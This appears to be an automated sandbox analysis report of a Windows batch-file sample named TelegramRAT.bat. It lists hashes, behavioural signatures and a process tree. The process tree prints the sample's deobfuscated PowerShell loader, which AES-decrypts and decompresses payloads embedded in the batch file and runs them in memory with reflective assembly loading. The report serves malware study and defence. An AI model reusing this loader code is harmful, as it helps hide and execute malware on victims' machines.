Analysis
-
max time kernel
122s -
max time network
122s -
platform
windows7_x64 -
resource
win7-20240903-en -
resource tags
arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system -
submitted
10-01-2025 09:34
Static task
static1
Behavioral task
behavioral1
Sample
TelegramRAT.bat
Resource
win7-20240903-en
windows7-x64
4 signatures
150 seconds
General
-
Target
TelegramRAT.bat
-
Size
410KB
-
MD5
7dda2cf82f482b84c7163a373fd37fe2
-
SHA1
718684e97ea03e285a11536508701fc3d77f285c
-
SHA256
a0ee800f44efdd76e8d5bba6d2d030147be21eff3219a3b7f569cda31ae39fa5
-
SHA512
ed28b9794de7b5de60ec27039628bb19519905212ca563127bee3a45946241b270a3beb6b7a353334f7bf5ed6ebe6ea87a8c9afb922b467b5dd062013e30b48d
-
SSDEEP
12288:hyfWmMRYqsiadmvG5SFHN1+knBRz+icY9R:hyumpfikmvkSFHN1+kWhYr
Score
8/10
Malware Config
Signatures
-
Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Run Powershell and hide display window.
pid Process 2380 powershell.exe -
Suspicious behavior: EnumeratesProcesses 1 IoCs
pid Process 2380 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 2380 powershell.exe -
Suspicious use of WriteProcessMemory 6 IoCs
description pid Process procid_target PID 1924 wrote to memory of 2388 1924 cmd.exe 31 PID 1924 wrote to memory of 2388 1924 cmd.exe 31 PID 1924 wrote to memory of 2388 1924 cmd.exe 31 PID 1924 wrote to memory of 2380 1924 cmd.exe 32 PID 1924 wrote to memory of 2380 1924 cmd.exe 32 PID 1924 wrote to memory of 2380 1924 cmd.exe 32
Processes
-
C:\Windows\system32\cmd.execmd /c "C:\Users\Admin\AppData\Local\Temp\TelegramRAT.bat"1⤵
- Suspicious use of WriteProcessMemory
PID:1924 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('cNpmRkJczn8mBzUEz7gPBxlaAIVsUlNOu90G1feOpAU='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('pUizGE0Hy59zHuK9PsFntQ=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $SLoFu=New-Object System.IO.MemoryStream(,$param_var); $HPdxN=New-Object System.IO.MemoryStream; $IGdrc=New-Object System.IO.Compression.GZipStream($SLoFu, [IO.Compression.CompressionMode]::Decompress); $IGdrc.CopyTo($HPdxN); $IGdrc.Dispose(); $SLoFu.Dispose(); $HPdxN.Dispose(); $HPdxN.ToArray();}function execute_function($param_var,$param2_var){ $BVMQB=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $WZMKy=$BVMQB.EntryPoint; $WZMKy.Invoke($null, $param2_var);}$cPfJC = 'C:\Users\Admin\AppData\Local\Temp\TelegramRAT.bat';$host.UI.RawUI.WindowTitle = $cPfJC;$NQAFM=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($cPfJC).Split([Environment]::NewLine);foreach ($ewsqW in $NQAFM) { if ($ewsqW.StartsWith('RjmgosMiBtxCViPmHLtP')) { $fOFeW=$ewsqW.Substring(20); break; }}$payloads_var=[string[]]$fOFeW.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "2⤵PID:2388
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2380
-